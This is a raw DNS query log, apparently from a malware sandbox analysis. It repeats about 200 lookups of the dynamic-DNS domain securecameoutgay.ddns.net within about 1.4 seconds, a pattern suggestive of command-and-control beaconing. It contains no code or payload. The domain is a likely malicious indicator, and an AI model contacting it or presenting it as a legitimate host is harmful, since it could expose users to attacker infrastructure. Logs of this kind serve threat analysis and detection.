                                                    Oct 12, 2024 23:06:08.344366074 CEST192.168.2.148.8.8.80x3cf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.352102041 CEST192.168.2.148.8.8.80x3cf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.359431028 CEST192.168.2.148.8.8.80x3cf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.368851900 CEST192.168.2.148.8.8.80x7e82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.378130913 CEST192.168.2.148.8.8.80x7e82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.386847019 CEST192.168.2.148.8.8.80x7e82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.395850897 CEST192.168.2.148.8.8.80x7e82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.402951956 CEST192.168.2.148.8.8.80x7e82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.410186052 CEST192.168.2.148.8.8.80x68b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.417649984 CEST192.168.2.148.8.8.80x68b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.426714897 CEST192.168.2.148.8.8.80x68b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.435656071 CEST192.168.2.148.8.8.80x68b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.447577953 CEST192.168.2.148.8.8.80x68b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.456749916 CEST192.168.2.148.8.8.80xbd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.465837955 CEST192.168.2.148.8.8.80xbd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.473277092 CEST192.168.2.148.8.8.80xbd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.480309963 CEST192.168.2.148.8.8.80xbd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.494033098 CEST192.168.2.148.8.8.80xbd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.500983953 CEST192.168.2.148.8.8.80x6761Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.508030891 CEST192.168.2.148.8.8.80x6761Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.515188932 CEST192.168.2.148.8.8.80x6761Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.523595095 CEST192.168.2.148.8.8.80x6761Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.530919075 CEST192.168.2.148.8.8.80x6761Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.538177013 CEST192.168.2.148.8.8.80xad73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.544611931 CEST192.168.2.148.8.8.80xad73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.552483082 CEST192.168.2.148.8.8.80xad73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.559988022 CEST192.168.2.148.8.8.80xad73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.568201065 CEST192.168.2.148.8.8.80xad73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.575686932 CEST192.168.2.148.8.8.80x8f9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.583498955 CEST192.168.2.148.8.8.80x8f9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.590585947 CEST192.168.2.148.8.8.80x8f9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.598078966 CEST192.168.2.148.8.8.80x8f9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.605516911 CEST192.168.2.148.8.8.80x8f9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.613135099 CEST192.168.2.148.8.8.80x2f73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.621397972 CEST192.168.2.148.8.8.80x2f73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.628983974 CEST192.168.2.148.8.8.80x2f73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.636276007 CEST192.168.2.148.8.8.80x2f73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.643898964 CEST192.168.2.148.8.8.80x2f73Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.651443005 CEST192.168.2.148.8.8.80xf6cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.659151077 CEST192.168.2.148.8.8.80xf6cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.666719913 CEST192.168.2.148.8.8.80xf6cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.674462080 CEST192.168.2.148.8.8.80xf6cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.682223082 CEST192.168.2.148.8.8.80xf6cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.691246033 CEST192.168.2.148.8.8.80x162aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.698350906 CEST192.168.2.148.8.8.80x162aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.705547094 CEST192.168.2.148.8.8.80x162aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.713012934 CEST192.168.2.148.8.8.80x162aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.720295906 CEST192.168.2.148.8.8.80x162aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.727686882 CEST192.168.2.148.8.8.80x3488Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.734764099 CEST192.168.2.148.8.8.80x3488Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.741727114 CEST192.168.2.148.8.8.80x3488Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.748460054 CEST192.168.2.148.8.8.80x3488Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.755475998 CEST192.168.2.148.8.8.80x3488Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.762330055 CEST192.168.2.148.8.8.80x2d9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.769107103 CEST192.168.2.148.8.8.80x2d9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.776940107 CEST192.168.2.148.8.8.80x2d9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.784040928 CEST192.168.2.148.8.8.80x2d9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.791059017 CEST192.168.2.148.8.8.80x2d9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.797873020 CEST192.168.2.148.8.8.80x1095Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.804811954 CEST192.168.2.148.8.8.80x1095Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.811412096 CEST192.168.2.148.8.8.80x1095Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.818372965 CEST192.168.2.148.8.8.80x1095Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.825746059 CEST192.168.2.148.8.8.80x1095Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.833353043 CEST192.168.2.148.8.8.80xf767Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.840778112 CEST192.168.2.148.8.8.80xf767Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.847934961 CEST192.168.2.148.8.8.80xf767Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.855412006 CEST192.168.2.148.8.8.80xf767Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.862783909 CEST192.168.2.148.8.8.80xf767Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.869961023 CEST192.168.2.148.8.8.80x4d95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.877715111 CEST192.168.2.148.8.8.80x4d95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.885353088 CEST192.168.2.148.8.8.80x4d95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.893520117 CEST192.168.2.148.8.8.80x4d95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.901010990 CEST192.168.2.148.8.8.80x4d95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.908974886 CEST192.168.2.148.8.8.80x2102Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.915324926 CEST192.168.2.148.8.8.80x2102Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.922157049 CEST192.168.2.148.8.8.80x2102Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.929408073 CEST192.168.2.148.8.8.80x2102Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.937025070 CEST192.168.2.148.8.8.80x2102Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.943826914 CEST192.168.2.148.8.8.80xca46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.950489998 CEST192.168.2.148.8.8.80xca46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.957807064 CEST192.168.2.148.8.8.80xca46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.965203047 CEST192.168.2.148.8.8.80xca46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.972079039 CEST192.168.2.148.8.8.80xca46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.979243040 CEST192.168.2.148.8.8.80xacebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.986358881 CEST192.168.2.148.8.8.80xacebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:08.994355917 CEST192.168.2.148.8.8.80xacebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.002149105 CEST192.168.2.148.8.8.80xacebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.009233952 CEST192.168.2.148.8.8.80xacebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.016853094 CEST192.168.2.148.8.8.80x9cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.023900032 CEST192.168.2.148.8.8.80x9cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.031047106 CEST192.168.2.148.8.8.80x9cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.038058996 CEST192.168.2.148.8.8.80x9cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.044789076 CEST192.168.2.148.8.8.80x9cbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.051835060 CEST192.168.2.148.8.8.80x77efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.059654951 CEST192.168.2.148.8.8.80x77efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.067178011 CEST192.168.2.148.8.8.80x77efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.074269056 CEST192.168.2.148.8.8.80x77efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.080955029 CEST192.168.2.148.8.8.80x77efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.089145899 CEST192.168.2.148.8.8.80x884dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.096571922 CEST192.168.2.148.8.8.80x884dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.103362083 CEST192.168.2.148.8.8.80x884dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.110210896 CEST192.168.2.148.8.8.80x884dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.116771936 CEST192.168.2.148.8.8.80x884dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.123399019 CEST192.168.2.148.8.8.80x7c74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.129941940 CEST192.168.2.148.8.8.80x7c74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.137387037 CEST192.168.2.148.8.8.80x7c74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.144963980 CEST192.168.2.148.8.8.80x7c74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.152491093 CEST192.168.2.148.8.8.80x7c74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.159665108 CEST192.168.2.148.8.8.80x2727Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.166265011 CEST192.168.2.148.8.8.80x2727Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.173387051 CEST192.168.2.148.8.8.80x2727Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.181528091 CEST192.168.2.148.8.8.80x2727Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.189558983 CEST192.168.2.148.8.8.80x2727Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.198173046 CEST192.168.2.148.8.8.80x6291Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.205248117 CEST192.168.2.148.8.8.80x6291Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.214994907 CEST192.168.2.148.8.8.80x6291Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.222165108 CEST192.168.2.148.8.8.80x6291Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.228780031 CEST192.168.2.148.8.8.80x6291Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.235934019 CEST192.168.2.148.8.8.80xd0b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.242863894 CEST192.168.2.148.8.8.80xd0b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.249946117 CEST192.168.2.148.8.8.80xd0b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.258925915 CEST192.168.2.148.8.8.80xd0b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.265897036 CEST192.168.2.148.8.8.80xd0b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.272739887 CEST192.168.2.148.8.8.80x890fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.279808044 CEST192.168.2.148.8.8.80x890fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.286760092 CEST192.168.2.148.8.8.80x890fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.294039011 CEST192.168.2.148.8.8.80x890fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.301340103 CEST192.168.2.148.8.8.80x890fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.308792114 CEST192.168.2.148.8.8.80xf77dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.316134930 CEST192.168.2.148.8.8.80xf77dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.323582888 CEST192.168.2.148.8.8.80xf77dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.331192017 CEST192.168.2.148.8.8.80xf77dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.338557959 CEST192.168.2.148.8.8.80xf77dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.345722914 CEST192.168.2.148.8.8.80x6c88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.352313995 CEST192.168.2.148.8.8.80x6c88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.359005928 CEST192.168.2.148.8.8.80x6c88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.365994930 CEST192.168.2.148.8.8.80x6c88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.372536898 CEST192.168.2.148.8.8.80x6c88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.380219936 CEST192.168.2.148.8.8.80x89d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.387444973 CEST192.168.2.148.8.8.80x89d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.394174099 CEST192.168.2.148.8.8.80x89d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.401051998 CEST192.168.2.148.8.8.80x89d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.407474995 CEST192.168.2.148.8.8.80x89d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.414374113 CEST192.168.2.148.8.8.80x94a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.421040058 CEST192.168.2.148.8.8.80x94a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.427604914 CEST192.168.2.148.8.8.80x94a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.435156107 CEST192.168.2.148.8.8.80x94a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.442791939 CEST192.168.2.148.8.8.80x94a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.450504065 CEST192.168.2.148.8.8.80xbba4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.458276033 CEST192.168.2.148.8.8.80xbba4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.466854095 CEST192.168.2.148.8.8.80xbba4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.474373102 CEST192.168.2.148.8.8.80xbba4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.481683016 CEST192.168.2.148.8.8.80xbba4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.488934040 CEST192.168.2.148.8.8.80xeb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.495641947 CEST192.168.2.148.8.8.80xeb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.502562046 CEST192.168.2.148.8.8.80xeb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.514935970 CEST192.168.2.148.8.8.80xeb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.521538019 CEST192.168.2.148.8.8.80xeb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.528481007 CEST192.168.2.148.8.8.80x2b6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.535516977 CEST192.168.2.148.8.8.80x2b6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.542016983 CEST192.168.2.148.8.8.80x2b6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.549190044 CEST192.168.2.148.8.8.80x2b6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.556585073 CEST192.168.2.148.8.8.80x2b6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.563700914 CEST192.168.2.148.8.8.80xb423Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.570456982 CEST192.168.2.148.8.8.80xb423Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.578147888 CEST192.168.2.148.8.8.80xb423Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.585169077 CEST192.168.2.148.8.8.80xb423Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.592279911 CEST192.168.2.148.8.8.80xb423Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.599785089 CEST192.168.2.148.8.8.80xd33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.607557058 CEST192.168.2.148.8.8.80xd33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.614469051 CEST192.168.2.148.8.8.80xd33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.621115923 CEST192.168.2.148.8.8.80xd33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.628256083 CEST192.168.2.148.8.8.80xd33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.635849953 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.643488884 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.650943995 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.658449888 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.665863037 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.673429966 CEST192.168.2.148.8.8.80xaa60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.680722952 CEST192.168.2.148.8.8.80xaa60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.687813997 CEST192.168.2.148.8.8.80xaa60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.694624901 CEST192.168.2.148.8.8.80xaa60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.704968929 CEST192.168.2.148.8.8.80xaa60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.712774992 CEST192.168.2.148.8.8.80x76d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.720248938 CEST192.168.2.148.8.8.80x76d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.726934910 CEST192.168.2.148.8.8.80x76d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.733666897 CEST192.168.2.148.8.8.80x76d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.740171909 CEST192.168.2.148.8.8.80x76d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
